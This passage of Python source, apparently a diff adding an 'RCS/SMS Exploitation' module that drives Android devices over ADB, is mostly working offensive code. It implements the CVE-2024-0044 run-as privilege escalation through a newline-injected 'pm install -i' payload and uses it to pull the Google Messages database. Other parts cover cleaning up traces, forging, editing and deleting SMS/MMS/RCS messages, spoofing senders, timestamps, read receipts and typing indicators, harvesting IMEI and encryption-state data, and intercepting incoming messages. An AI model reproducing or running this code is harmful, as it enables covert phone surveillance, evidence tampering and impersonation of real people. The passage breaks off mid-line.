WHEN 1 THEN 'MMS' ELSE 'RCS' + END AS protocol_name + FROM messages m + LEFT JOIN parts p ON m._id = p.message_id + ORDER BY m.sent_timestamp DESC + """ + msgs = self.query_bugle_db(sql_msgs) + result['messages'] = msgs.get('rows', []) if msgs.get('ok') else [] + + # Conversations + convos = self.extract_conversations_from_bugle() + result['conversations'] = convos.get('rows', []) if convos.get('ok') else [] + + # Participants + sql_parts = "SELECT * FROM participants ORDER BY _id" + parts = self.query_bugle_db(sql_parts) + result['participants'] = parts.get('rows', []) if parts.get('ok') else [] + + # Edits + edits = self.extract_message_edits() + result['edits'] = edits.get('rows', []) if edits.get('ok') else [] + + result['ok'] = True + result['total_messages'] = len(result['messages']) + result['total_conversations'] = len(result['conversations']) + result['total_participants'] = len(result['participants']) + + # Save to file + export_path = self._exports_dir / f'bugle_full_export_{datetime.now().strftime("%Y%m%d_%H%M%S")}.json' + with open(export_path, 'w') as f: + json.dump(result, f, indent=2, default=str) + result['export_path'] = str(export_path) + return result + + # ══════════════════════════════════════════════════════════════════════ + # §6 CVE-2024-0044 EXPLOIT + # ══════════════════════════════════════════════════════════════════════ + + def check_cve_2024_0044(self) -> Dict[str, Any]: + """Check if device is vulnerable to CVE-2024-0044 (run-as privilege escalation).""" + patch_info = self.get_security_patch_level() + result = { + 'cve': 'CVE-2024-0044', + 'description': RCS_CVES['CVE-2024-0044']['desc'], + 'android_version': patch_info.get('android_version', 'unknown'), + 'security_patch': patch_info.get('security_patch', 'unknown'), + 'vulnerable': patch_info.get('cve_2024_0044_vulnerable', False), + } + if result['vulnerable']: + result['message'] = ('Device appears vulnerable. Android 12/13 with security patch ' + f'before 2024-10-01 (current: {result["security_patch"]})') + else: + result['message'] = 'Device does not appear vulnerable to CVE-2024-0044' + return result + + def exploit_cve_2024_0044(self, target_package: str = 'com.google.android.apps.messaging') -> Dict[str, Any]: + """Execute CVE-2024-0044 run-as privilege escalation. + + This exploits a newline injection in PackageInstallerService to forge + a package entry, allowing run-as access to any app's private data. + Only works on Android 12-13 with security patch before October 2024. + """ + # Verify vulnerability + cve = self.check_cve_2024_0044() + if not cve.get('vulnerable'): + return {'ok': False, 'error': 'Device not vulnerable to CVE-2024-0044', 'details': cve} + + # Step 1: Get target app UID + uid_output = self._shell(f'pm list packages -U | grep {target_package}') + if self._is_error(uid_output) or target_package not in uid_output: + return {'ok': False, 'error': f'Package {target_package} not found'} + + uid_match = re.search(r'uid:(\d+)', uid_output) + if not uid_match: + return {'ok': False, 'error': 'Could not determine target UID'} + target_uid = uid_match.group(1) + + # Step 2: Create a minimal APK to push (we need any valid APK) + # Use an existing small APK from the device + apk_path = self._shell(f'pm path {target_package}') + if self._is_error(apk_path): + return {'ok': False, 'error': 'Cannot find target APK path'} + apk_path = apk_path.replace('package:', '').strip() + + # Copy to writable location + self._shell('cp /system/app/BasicDreams/BasicDreams.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') + # Fallback: use any small system apk + if 'error' in self._shell('ls /data/local/tmp/exploit_carrier.apk').lower(): + # Try another approach — use settings apk + self._shell('cp /system/priv-app/Settings/Settings.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') + + # Step 3: Craft the injection payload + victim_name = f'autarch_victim_{int(time.time())}' + payload = ( + f'@null\n' + f'{victim_name} {target_uid} 1 /data/user/0 ' + f'default:targetSdkVersion=28 none 0 0 1 @null' + ) + + # Step 4: Install with injected payload + install_result = self._shell( + f'pm install -i "{payload}" /data/local/tmp/exploit_carrier.apk', + timeout=15, + ) + + # Step 5: Verify access + verify = self._shell(f'run-as {victim_name} id') + if f'uid={target_uid}' in verify or 'u0_a' in verify: + self._cve_exploit_active = True + self._exploit_victim_name = victim_name + return { + 'ok': True, + 'message': f'CVE-2024-0044 exploit successful. run-as {victim_name} has UID {target_uid}', + 'victim_name': victim_name, + 'target_uid': target_uid, + 'target_package': target_package, + 'verify': verify, + } + return { + 'ok': False, + 'error': 'Exploit attempt did not achieve expected UID', + 'install_result': install_result, + 'verify': verify, + } + + def _extract_via_cve(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db using CVE-2024-0044 exploit.""" + if not self._cve_exploit_active: + exploit = self.exploit_cve_2024_0044() + if not exploit.get('ok'): + return exploit + + victim = self._exploit_victim_name + staging = '/data/local/tmp/autarch_cve_extract' + self._shell(f'mkdir -p {staging}') + self._shell(f'chmod 777 {staging}') + + # Use run-as to access and copy databases + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + for db_base in BUGLE_DB_PATHS: + src = f'{db_base}{suffix}' + self._shell( + f'run-as {victim} sh -c "cat {src}" > {staging}/{fname} 2>/dev/null' + ) + + # Pull extracted files + files_pulled = [] + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if os.path.exists(local_path) and os.path.getsize(local_path) > 0: + files_pulled.append(fname) + + # Cleanup + self._shell(f'rm -rf {staging}') + + if files_pulled: + return { + 'ok': True, 'method': 'cve-2024-0044', + 'files': files_pulled, 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via CVE-2024-0044', + } + return {'ok': False, 'error': 'CVE extract produced no files'} + + def cleanup_cve_exploit(self) -> Dict[str, Any]: + """Remove traces of CVE-2024-0044 exploit.""" + results = [] + if self._exploit_victim_name: + # Uninstall the forged package + out = self._shell(f'pm uninstall {self._exploit_victim_name}') + results.append(f'Uninstall {self._exploit_victim_name}: {out}') + # Remove staging files + self._shell('rm -f /data/local/tmp/exploit_carrier.apk') + self._shell('rm -rf /data/local/tmp/autarch_cve_extract') + self._cve_exploit_active = False + self._exploit_victim_name = None + return {'ok': True, 'cleanup': results} + + # ══════════════════════════════════════════════════════════════════════ + # §7 MESSAGE FORGING + # ══════════════════════════════════════════════════════════════════════ + + def forge_sms(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, + timestamp: Optional[int] = None, contact_name: Optional[str] = None, + read: int = 1) -> Dict[str, Any]: + if not address or not body: + return {'ok': False, 'error': 'Address and body are required'} + ts = timestamp or self._ts_ms() + bindings = { + 'address': address, + 'body': body, + 'type': msg_type, + 'date': ts, + 'date_sent': ts, + 'read': read, + 'seen': 1, + } + result = self._content_insert(SMS_URI, bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'contact_name': contact_name, + 'action': 'forge_sms', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'SMS forged successfully', 'details': entry} + + def forge_mms(self, address: str, subject: str = '', body: str = '', + msg_box: int = MMS_BOX_INBOX, timestamp: Optional[int] = None) -> Dict[str, Any]: + if not address: + return {'ok': False, 'error': 'Address required'} + ts = timestamp or int(time.time()) + bindings = { + 'msg_box': msg_box, + 'date': ts, + 'read': 1, + 'seen': 1, + } + if subject: + bindings['sub'] = subject + result = self._content_insert(MMS_URI, bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + entry = { + 'address': address, 'subject': subject, 'body': body, + 'action': 'forge_mms', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'MMS forged', 'details': entry} + + def forge_rcs(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, + timestamp: Optional[int] = None) -> Dict[str, Any]: + """Forge an RCS message. + + Attempts content://rcs/ provider first, falls back to Archon relay + for direct bugle_db insertion. + """ + if not address or not body: + return {'ok': False, 'error': 'Address and body required'} + ts = timestamp or self._ts_ms() + + # Try AOSP RCS provider + bindings = { + 'rcs_text': body, + 'origination_timestamp': ts, + } + result = self._content_insert(f'{RCS_P2P_THREAD_URI}/0/incoming_message', bindings) + if not self._is_error(result) and 'SecurityException' not in result: + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'method': 'rcs_provider', + 'action': 'forge_rcs', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'RCS message forged via provider', 'details': entry} + + # Fallback: Archon relay + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.FORGE_RCS ' + f'--es address "{address}" ' + f'--es body "{body}" ' + f'--ei type {msg_type} ' + f'--el timestamp {ts} ' + f'com.darkhal.archon' + ) + result = self._run_adb(broadcast) + method = 'archon' if 'Broadcast completed' in result else 'failed' + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'method': method, + 'action': 'forge_rcs', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + if method == 'archon': + return {'ok': True, 'message': 'RCS message forged via Archon', 'details': entry} + return {'ok': False, 'error': 'RCS forging requires Archon app or elevated access'} + + def forge_conversation(self, address: str, messages: List[Dict], + contact_name: Optional[str] = None) -> Dict[str, Any]: + if not address or not messages: + return {'ok': False, 'error': 'Address and messages required'} + results = [] + for msg in messages: + body = msg.get('body', '') + msg_type = int(msg.get('type', MSG_TYPE_INBOX)) + ts = msg.get('timestamp') + if ts: + ts = int(ts) + r = self.forge_sms(address, body, msg_type, ts, contact_name) + results.append(r) + ok_count = sum(1 for r in results if r.get('ok')) + return { + 'ok': ok_count > 0, + 'message': f'Forged {ok_count}/{len(messages)} messages', + 'results': results, + } + + def bulk_forge(self, messages_list: List[Dict]) -> Dict[str, Any]: + results = [] + for msg in messages_list: + r = self.forge_sms( + address=msg.get('address', ''), + body=msg.get('body', ''), + msg_type=int(msg.get('type', MSG_TYPE_INBOX)), + timestamp=int(msg['timestamp']) if msg.get('timestamp') else None, + contact_name=msg.get('contact_name'), + read=int(msg.get('read', 1)), + ) + results.append(r) + ok_count = sum(1 for r in results if r.get('ok')) + return {'ok': ok_count > 0, 'forged': ok_count, 'total': len(messages_list)} + + def import_sms_backup_xml(self, xml_content: str) -> Dict[str, Any]: + """Import SMS from SMS Backup & Restore XML format.""" + try: + root = ET.fromstring(xml_content) + except ET.ParseError as e: + return {'ok': False, 'error': f'Invalid XML: {e}'} + count = 0 + errors = [] + for sms_elem in root.findall('.//sms'): + address = sms_elem.get('address', '') + body = sms_elem.get('body', '') + msg_type = int(sms_elem.get('type', '1')) + date = sms_elem.get('date') + read = int(sms_elem.get('read', '1')) + if not address: + continue + ts = int(date) if date else None + result = self.forge_sms(address, body, msg_type, ts, read=read) + if result.get('ok'): + count += 1 + else: + errors.append(result.get('error', 'unknown')) + return { + 'ok': count > 0, + 'imported': count, + 'errors': len(errors), + 'error_details': errors[:10], + } + + # ══════════════════════════════════════════════════════════════════════ + # §8 MESSAGE MODIFICATION + # ══════════════════════════════════════════════════════════════════════ + + def modify_message(self, msg_id: int, new_body: Optional[str] = None, + new_timestamp: Optional[int] = None, new_type: Optional[int] = None, + new_read: Optional[int] = None) -> Dict[str, Any]: + bindings = {} + if new_body is not None: + bindings['body'] = new_body + if new_timestamp is not None: + bindings['date'] = new_timestamp + if new_type is not None: + bindings['type'] = new_type + if new_read is not None: + bindings['read'] = new_read + if not bindings: + return {'ok': False, 'error': 'No modifications specified'} + result = self._content_update(f'{SMS_URI}{msg_id}', bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} modified', 'changes': bindings} + + def delete_message(self, msg_id: int) -> Dict[str, Any]: + result = self._content_delete(f'{SMS_URI}{msg_id}') + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} deleted'} + + def delete_conversation(self, thread_id: int) -> Dict[str, Any]: + result = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Thread {thread_id} deleted'} + + def change_sender(self, msg_id: int, new_address: str) -> Dict[str, Any]: + result = self._content_update(f'{SMS_URI}{msg_id}', {'address': new_address}) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} sender changed to {new_address}'} + + def shift_timestamps(self, address: str, offset_minutes: int) -> Dict[str, Any]: + safe_addr = address.replace("'", "''") + msgs = self._content_query(SMS_URI, projection='_id:date', + where=f"address='{safe_addr}'") + modified = 0 + offset_ms = offset_minutes * 60 * 1000 + for msg in msgs: + msg_id = msg.get('_id') + old_date = msg.get('date') + if msg_id and old_date: + new_date = int(old_date) + offset_ms + r = self._content_update(f'{SMS_URI}{msg_id}', {'date': new_date}) + if not self._is_error(r): + modified += 1 + return {'ok': modified > 0, 'modified': modified, 'total': len(msgs)} + + def mark_all_read(self, thread_id: Optional[int] = None) -> Dict[str, Any]: + where = f'thread_id={thread_id} AND read=0' if thread_id else 'read=0' + result = self._content_update(SMS_URI, {'read': 1}, where=where) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': 'Messages marked as read'} + + def wipe_thread(self, thread_id: int) -> Dict[str, Any]: + # Delete from both SMS and MMS + r1 = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') + r2 = self._content_delete(MMS_URI, where=f'thread_id={thread_id}') + return {'ok': True, 'sms_result': r1, 'mms_result': r2, + 'message': f'Thread {thread_id} wiped'} + + # ══════════════════════════════════════════════════════════════════════ + # §9 RCS EXPLOITATION + # ══════════════════════════════════════════════════════════════════════ + + def read_rcs_features(self, address: str) -> Dict[str, Any]: + """Check RCS capabilities for a phone number.""" + # Try dumpsys for RCS capability info + output = self._shell(f'dumpsys telephony_ims') + features = {'address': address, 'rcs_capable': False, 'features': []} + if output and not self._is_error(output): + if address in output: + features['rcs_capable'] = True + # Parse UCE capabilities + for line in output.splitlines(): + if 'capability' in line.lower() or 'uce' in line.lower(): + features['features'].append(line.strip()) + # Also try Archon query + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.CHECK_RCS_CAPABLE ' + f'--es address "{address}" com.darkhal.archon' + ) + self._run_adb(broadcast) + return {'ok': True, **features} + + def spoof_rcs_read_receipt(self, msg_id: str) -> Dict[str, Any]: + """Spoof a read receipt for an RCS message.""" + # Via content provider update + result = self._content_update( + f'content://rcs/p2p_thread/0/incoming_message/{msg_id}', + {'seen_timestamp': self._ts_ms()}, + ) + if not self._is_error(result) and 'SecurityException' not in result: + return {'ok': True, 'message': f'Read receipt spoofed for message {msg_id}'} + # Fallback: Archon + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.SPOOF_READ_RECEIPT ' + f'--es msg_id "{msg_id}" com.darkhal.archon' + ) + r = self._run_adb(broadcast) + return { + 'ok': 'Broadcast completed' in r, + 'message': 'Read receipt spoof attempted via Archon', + } + + def spoof_rcs_typing(self, address: str) -> Dict[str, Any]: + """Send a fake typing indicator via Archon.""" + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.SPOOF_TYPING ' + f'--es address "{address}" com.darkhal.archon' + ) + r = self._run_adb(broadcast) + return { + 'ok': 'Broadcast completed' in r, + 'message': f'Typing indicator spoofed to {address}', + } + + def enumerate_rcs_providers(self) -> Dict[str, Any]: + """Discover all accessible messaging content providers on the device.""" + return self.enumerate_providers() + + def clone_rcs_identity(self) -> Dict[str, Any]: + """Extract RCS registration/identity data for cloning.""" + identity = {} + # Get IMSI/ICCID + identity['imei'] = self._shell('service call iphonesubinfo 1 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') + identity['phone_number'] = self._shell('service call iphonesubinfo 15 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') + # Get RCS provisioning state + for pkg in MESSAGING_PACKAGES: + sp_dir = f'/data/data/{pkg}/shared_prefs/' + files = self._shell(f'run-as {self._exploit_victim_name} ls {sp_dir} 2>/dev/null') \ + if self._cve_exploit_active else '' + if files and not self._is_error(files): + identity[f'{pkg}_shared_prefs'] = files.splitlines() + # Get SIM info + identity['sim_operator'] = self._shell('getprop gsm.sim.operator.alpha') + identity['sim_country'] = self._shell('getprop gsm.sim.operator.iso-country') + identity['network_type'] = self._shell('getprop gsm.network.type') + return {'ok': True, 'identity': identity} + + def extract_rcs_media(self, msg_id: str) -> Dict[str, Any]: + """Extract media files from RCS messages.""" + # Check MMS parts for media + parts = self._content_query( + f'content://mms/{msg_id}/part', + projection='_id:mid:ct:_data:name', + ) + media_files = [] + for part in parts: + ct = part.get('ct', '') + if ct and ct != 'text/plain' and ct != 'application/smil': + data_path = part.get('_data', '') + if data_path: + # Pull the file + local_name = f"media_{msg_id}_{part.get('_id', 'unknown')}" + ext = ct.split('/')[-1] if '/' in ct else 'bin' + local_path = str(self._exports_dir / f'{local_name}.{ext}') + pull = self._run_adb(f'pull {data_path} {local_path}') + if os.path.exists(local_path): + media_files.append({ + 'content_type': ct, + 'local_path': local_path, + 'device_path': data_path, + 'name': part.get('name', ''), + }) + return {'ok': True, 'media': media_files, 'count': len(media_files)} + + def intercept_archival_broadcast(self) -> Dict[str, Any]: + """Set up interception of GOOGLE_MESSAGES_ARCHIVAL_UPDATE broadcasts. + + This is the enterprise archival broadcast that Google Messages sends + when messages are sent, received, edited, or deleted on managed devices. + """ + # Register a broadcast receiver via Archon + broadcast = ( + 'shell am broadcast -a com.darkhal.archon.REGISTER_ARCHIVAL_LISTENER ' + 'com.darkhal.archon' + ) + r = self._run_adb(broadcast) + info = { + 'broadcast_action': ARCHIVAL_BROADCAST_ACTION, + 'uri_extra_key': ARCHIVAL_URI_EXTRA, + 'note': 'Requires fully managed device with Google Messages as default SMS app', + 'requirement': 'MCM config: messages_archival = com.darkhal.archon', + } + return { + 'ok': 'Broadcast completed' in r, + 'message': 'Archival listener registration attempted', + 'info': info, + } + + def extract_signal_protocol_state(self) -> Dict[str, Any]: + """Extract E2EE Signal Protocol session state (requires elevated access).""" + if not self._cve_exploit_active: + return { + 'ok': False, + 'error': 'Requires CVE-2024-0044 exploit or root access', + 'note': 'Signal Protocol keys are in ' + '/data/data/com.google.android.apps.messaging/files/ ' + 'but master key is in Android Keystore (hardware-backed, not extractable via ADB)', + } + victim = self._exploit_victim_name + # List files in the messaging app's files directory + files = self._shell( + f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/files/' + ) + # List shared_prefs + prefs = self._shell( + f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/shared_prefs/' + ) + return { + 'ok': True, + 'files_dir': files.splitlines() if files and not self._is_error(files) else [], + 'shared_prefs': prefs.splitlines() if prefs and not self._is_error(prefs) else [], + 'note': 'Session keys found but master encryption key is hardware-backed in Android Keystore', + } + + def get_rcs_cve_database(self) -> Dict[str, Any]: + """Return known CVEs affecting RCS/Android messaging.""" + return {'ok': True, 'cves': RCS_CVES, 'count': len(RCS_CVES)} + + # ══════════════════════════════════════════════════════════════════════ + # §10 DATABASE BACKUP & CLONE + # ══════════════════════════════════════════════════════════════════════ + + def full_backup(self, fmt: str = 'json') -> Dict[str, Any]: + """Complete SMS/MMS/RCS backup.""" + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + + # Get SMS + sms = self.read_sms_database(limit=10000) + # Get MMS + mms = self.read_mms_database(limit=5000) + # Get conversations + convos = self.read_conversations(limit=1000) + # Try RCS provider + rcs = self.read_rcs_provider() + + backup = { + 'timestamp': timestamp, + 'device': self.get_device_info(), + 'sms': sms, + 'mms': mms, + 'conversations': convos, + 'rcs': rcs if rcs.get('ok') else {}, + 'stats': { + 'sms_count': len(sms), + 'mms_count': len(mms), + 'conversation_count': len(convos), + }, + } + + if fmt == 'xml': + backup_path = self._backups_dir / f'backup_{timestamp}.xml' + self._write_sms_backup_xml(sms, str(backup_path)) + else: + backup_path = self._backups_dir / f'backup_{timestamp}.json' + with open(backup_path, 'w') as f: + json.dump(backup, f, indent=2, default=str) + + return { + 'ok': True, + 'path': str(backup_path), + 'stats': backup['stats'], + 'message': f'Backup saved to {backup_path}', + } + + def _write_sms_backup_xml(self, messages: List[Dict], path: str): + """Write SMS Backup & Restore compatible XML.""" + root = ET.Element('smses', count=str(len(messages))) + for msg in messages: + attrs = { + 'protocol': str(msg.get('protocol', '0') or '0'), + 'address': str(msg.get('address', '') or ''), + 'date': str(msg.get('date', '') or ''), + 'type': str(msg.get('type', '1') or '1'), + 'body': str(msg.get('body', '') or ''), + 'read': str(msg.get('read', '1') or '1'), + 'status': str(msg.get('status', '-1') or '-1'), + 'locked': str(msg.get('locked', '0') or '0'), + 'date_sent': str(msg.get('date_sent', '0') or '0'), + 'readable_date': str(msg.get('date_formatted', '') or ''), + 'contact_name': str(msg.get('contact_name', '(Unknown)') or '(Unknown)'), + } + ET.SubElement(root, 'sms', **attrs) + tree = ET.ElementTree(root) + ET.indent(tree, space=' ') + tree.write(path, encoding='unicode', xml_declaration=True) + + def full_restore(self, backup_path: str) -> Dict[str, Any]: + """Restore messages from a backup file.""" + path = Path(backup_path) + if not path.exists(): + # Check in backups dir + path = self._backups_dir / backup_path + if not path.exists(): + return {'ok': False, 'error': f'Backup file not found: {backup_path}'} + + if path.suffix == '.xml': + with open(path, 'r') as f: + return self.import_sms_backup_xml(f.read()) + elif path.suffix == '.json': + with open(path, 'r') as f: + backup = json.load(f) + sms = backup.get('sms', []) + if not sms: + return {'ok': False, 'error': 'No SMS messages in backup'} + return self.bulk_forge(sms) + return {'ok': False, 'error': f'Unsupported format: {path.suffix}'} + + def clone_to_device(self) -> Dict[str, Any]: + """Clone all messages from current device backup to another device. + + Steps: 1) Run full_backup on source, 2) Connect target device, + 3) Run full_restore with the backup file. + """ + backup = self.full_backup() + if not backup.get('ok'): + return backup + return { + 'ok': True, + 'message': 'Backup created. Connect target device and call full_restore()', + 'backup_path': backup['path'], + 'stats': backup['stats'], + } + + def export_messages(self, address: Optional[str] = None, fmt: str = 'json') -> Dict[str, Any]: + """Export messages to JSON, CSV, or XML.""" + if address: + msgs = self.get_messages_by_address(address) + else: + msgs = self.read_sms_database(limit=10000) + + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + suffix = f'_{address}' if address else '_all' + + if fmt == 'csv': + export_path = self._exports_dir / f'export{suffix}_{timestamp}.csv' + with open(export_path, 'w', newline='') as f: + if msgs: + writer = csv.DictWriter(f, fieldnames=msgs[0].keys()) + writer.writeheader() + writer.writerows(msgs) + elif fmt == 'xml': + export_path = self._exports_dir / f'export{suffix}_{timestamp}.xml' + self._write_sms_backup_xml(msgs, str(export_path)) + else: + export_path = self._exports_dir / f'export{suffix}_{timestamp}.json' + with open(export_path, 'w') as f: + json.dump(msgs, f, indent=2, default=str) + + return { + 'ok': True, + 'path': str(export_path), + 'count': len(msgs), + 'format': fmt, + } + + def list_backups(self) -> Dict[str, Any]: + """List all backup files.""" + backups = [] + for f in sorted(self._backups_dir.iterdir(), reverse=True): + if f.is_file(): + backups.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), + }) + return {'ok': True, 'backups': backups, 'count': len(backups)} + + def list_exports(self) -> Dict[str, Any]: + """List all exported files.""" + exports = [] + for f in sorted(self._exports_dir.iterdir(), reverse=True): + if f.is_file(): + exports.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), + }) + return {'ok': True, 'exports': exports, 'count': len(exports)} + + def list_extracted_dbs(self) -> Dict[str, Any]: + """List extracted database snapshots.""" + extractions = [] + for d in sorted(self._extracted_dir.iterdir(), reverse=True): + if d.is_dir(): + files = [f.name for f in d.iterdir()] + total_size = sum(f.stat().st_size for f in d.iterdir() if f.is_file()) + extractions.append({ + 'name': d.name, + 'path': str(d), + 'files': files, + 'total_size': total_size, + }) + return {'ok': True, 'extractions': extractions, 'count': len(extractions)} + + # ══════════════════════════════════════════════════════════════════════ + # §11 SMS/RCS MONITOR + # ══════════════════════════════════════════════════════════════════════ + + def start_sms_monitor(self) -> Dict[str, Any]: + if self._monitor_running: + return {'ok': False, 'error': 'Monitor already running'} + self._monitor_running = True + self._monitor_thread = threading.Thread( + target=self._monitor_loop, daemon=True, name='rcs-monitor', + ) + self._monitor_thread.start() + return {'ok': True, 'message': 'SMS/RCS monitor started'} + + def stop_sms_monitor(self) -> Dict[str, Any]: + self._monitor_running = False + return {'ok': True, 'message': 'Monitor stopping', + 'intercepted': len(self._intercepted)} + + def get_intercepted_messages(self) -> Dict[str, Any]: + with self._intercepted_lock: + msgs = list(self._intercepted) + return {'ok': True, 'messages': msgs, 'count': len(msgs)} + + def clear_intercepted(self) -> Dict[str, Any]: + with self._intercepted_lock: + count = len(self._intercepted) + self._intercepted.clear() + return {'ok': True, 'cleared': count} + + def _monitor_loop(self): + """Background thread: watch logcat for incoming SMS/RCS.""" + adb = self._get_adb() + try: + proc = subprocess.Popen( + f'{adb} shell logcat -s Bugle:V SmsReceiverService:V ' + f'SmsMessage:V RilReceiver:V', + shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, + ) + while self._monitor_running: + line = proc.stdout.readline() + if not line: + break + line = line.strip() + if not line: + continue + # Parse relevant log lines + entry = None + if 'SMS received' in line or 'received SMS' in line.lower(): + entry = {'type': 'sms_received', 'raw': line, 'time': datetime.now().isoformat()} + elif 'RCS' in line and ('received' in line.lower() or 'incoming' in line.lower()): + entry = {'type': 'rcs_received', 'raw': line, 'time': datetime.now().isoformat()} + elif 'SmsMessage' in line: + entry = {'type': 'sms_activity', 'raw': line, 'time': datetime.now().isoformat()} + if entry: + with self._intercepted_lock: + self._intercepted.append(entry) + if len(self._intercepted) > 1000: + self._intercepted = self._intercepted[-500:] + proc.terminate() + except Exception: + pass + finally: + self._monitor_running = False + + def get_forged_log(self) -> List[Dict[str, Any]]: + return list(self._forged_log) + + def clear_forged_log(self) -> Dict[str, Any]: + count = len(self._forged_log) + self._forged_log.clear() + return {'ok': True, 'cleared': count} + + # ══════════════════════════════════════════════════════════════════════ + # §12 ARCHON APP INTEGRATION + # ══════════════════════════════════════════════════════════════════════ + + def archon_query(self, action: str, extras: Optional[Dict[str, str]] = None) -> Dict[str, Any]: + """Send a command to Archon's MessagingModule via ADB broadcast.""" + cmd = f'shell am broadcast -a com.darkhal.archon.{action}' + if extras: + for key, val in extras.items(): + if isinstance(val, int): + cmd += f' --ei {key} {val}' + elif isinstance(val, bool): + cmd += f' --ez {key} {str(val).lower()}' + else: + safe = str(val).replace('"', '\\"') + cmd += f' --es {key} "{safe}"' + cmd += ' com.darkhal.archon' + result = self._run_adb(cmd) + return { + 'ok': 'Broadcast completed' in result, + 'result': result, + } + + def archon_extract_bugle(self) -> Dict[str, Any]: + """Ask Archon to extract bugle_db via Shizuku elevated access.""" + return self.archon_query('EXTRACT_DB', { + 'target_package': 'com.google.android.apps.messaging', + 'database': 'bugle_db', + 'output_dir': '/sdcard/Download/autarch_extract', + }) + + def archon_forge_rcs(self, address: str, body: str, direction: str = 'incoming') -> Dict[str, Any]: + """Ask Archon to insert RCS message directly into bugle_db.""" + return self.archon_query('FORGE_RCS', { + 'address': address, + 'body': body, + 'direction': direction, + 'timestamp': str(self._ts_ms()), + }) + + def archon_modify_rcs(self, msg_id: int, new_body: str) -> Dict[str, Any]: + """Ask Archon to modify an RCS message in bugle_db.""" + return self.archon_query('MODIFY_RCS', { + 'msg_id': msg_id, + 'new_body': new_body, + }) + + def archon_get_rcs_threads(self) -> Dict[str, Any]: + """Get RCS thread list via Archon relay.""" + return self.archon_query('GET_RCS_THREADS') + + def archon_backup_all(self) -> Dict[str, Any]: + """Full backup via Archon (SMS + MMS + RCS + attachments).""" + result = self.archon_query('FULL_BACKUP', { + 'output_dir': '/sdcard/Download/autarch_backup', + 'include_rcs': 'true', + 'include_attachments': 'true', + }) + if result.get('ok'): + # Pull the backup + time.sleep(5) + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + local_dir = self._backups_dir / f'archon_backup_{timestamp}' + local_dir.mkdir(parents=True, exist_ok=True) + pull = self._run_adb(f'pull /sdcard/Download/autarch_backup/ {local_dir}/') + result['local_path'] = str(local_dir) + result['pull_result'] = pull + return result + + def archon_set_default_sms(self) -> Dict[str, Any]: + """Set Archon as the default SMS/RCS app (enables full message access).""" + return self.set_default_sms_app('com.darkhal.archon') + + # ══════════════════════════════════════════════════════════════════════ + # §13 PIXEL-SPECIFIC TOOLS + # ══════════════════════════════════════════════════════════════════════ + + def pixel_diagnostics(self) -> Dict[str, Any]: + """Run Pixel-specific RCS diagnostic commands.""" + results = {} + # IMS status + results['ims'] = self._shell('dumpsys telephony_ims')[:3000] + # Carrier config (extract RCS-relevant keys) + cc = self.get_carrier_config() + results['carrier_rcs_config'] = cc.get('rcs_config', {}) + # Phone info + results['phone'] = self._shell('dumpsys phone | head -50') + # Check if Pixel + brand = self._shell('getprop ro.product.brand').lower() + results['is_pixel'] = 'google' in brand + # RCS-specific settings + results['rcs_settings'] = {} + for key in ['rcs_autoconfiguration_enabled', 'rcs_e2ee_enabled', + 'chat_features_enabled']: + val = self._shell(f'settings get global {key}') + if not self._is_error(val): + results['rcs_settings'][key] = val + return {'ok': True, **results} + + def enable_debug_menu(self) -> Dict[str, Any]: + """Instructions and automation for enabling Google Messages debug menu.""" + return { + 'ok': True, + 'instructions': [ + '1. Open Google Messages on the device', + '2. Tap the search bar', + '3. Type: *xyzzy*', + '4. A debug menu will appear in Settings', + '5. Enables: RCS connection state, ACS URL, feature flags, verbose logging', + ], + 'automated_phenotype': 'Use enable_verbose_logging() to enable debug flags via Phenotype', + } + + # ══════════════════════════════════════════════════════════════════════ + # §14 CLI ENTRY POINT + # ══════════════════════════════════════════════════════════════════════ + + def run(self): + """CLI interactive mode.""" + print(f"\n RCS/SMS Exploitation v{VERSION}") + print(" " + "=" * 40) + status = self.get_status() + if status.get('connected'): + dev = status['device'] + print(f" Device: {dev.get('model', '?')} ({dev.get('serial', '?')})") + print(f" Android: {dev.get('android_version', 